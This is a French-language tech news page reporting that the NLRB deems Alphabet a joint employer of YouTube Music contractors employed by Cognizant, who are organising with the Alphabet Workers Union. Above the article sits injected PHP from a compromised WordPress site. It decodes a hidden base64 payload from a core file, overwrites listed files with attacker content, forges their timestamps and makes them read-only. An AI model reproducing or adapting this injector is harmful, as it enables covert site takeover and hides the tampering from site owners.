$wp_update_file="/home/technorev/domains/technorevue.fr/public_html/wp-includes/date-time.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } La décision du conseil du travail pourrait forcer Google à négocier avec les sous-traitants de YouTube

La décision du conseil du travail pourrait forcer Google à négocier avec les sous-traitants de YouTube

Le Conseil national des relations du travail a décidé qu’Alphabet, la société mère de Google, devrait être considérée comme un employeur conjoint pour un groupe de sous-traitants de YouTube Music. Les travailleurs tentent actuellement de s’organiser avec l’Alphabet Worker’s Union, et la décision du NLRB pourrait signifier que le géant de la technologie doit négocier avec eux s’ils votent pour se syndiquer lors d’une prochaine élection.

Les travailleurs sont directement employés par une société appelée Cognizant, qui agit en tant que sous-traitant d’Alphabet. Cependant, le NLRB estime que Google a suffisamment de contrôle sur leurs « avantages sociaux, heures de travail, supervision et direction du travail » pour qu’il soit considéré comme un employeur partiel, selon Bloomberg.

« Nous sommes fiers de remporter une victoire sans précédent, non seulement pour nous-mêmes, mais aussi pour les travailleurs de tout le pays », a déclaré Sam Regan, un organisateur syndical et entrepreneur de YouTube Music, cité dans un communiqué de presse de l’AWU. « Les entreprises technologiques en particulier ont innové de nouvelles façons de nier la responsabilité des moyens de subsistance de leurs travailleurs par le biais de la sous-traitance, du travail à la demande et d’autres mauvaises pratiques d’emploi. »

De son côté, Alphabet entend faire appel de la décision du NLRB. « Nous ne contrôlons tout simplement pas les conditions d’emploi ou de travail de ces travailleurs », a déclaré la porte-parole Courtenay Mencini. Bloomberg.

En plus de la campagne syndicale et de la lutte pour faire reconnaître Alphabet en tant qu’employeur conjoint, les entrepreneurs se sont mis en grève en février pour protester contre les ordres de retour au bureau – la première grève dans l’entreprise, selon l’AWU. Les dates des élections syndicales n’ont pas encore été annoncées publiquement.

Techno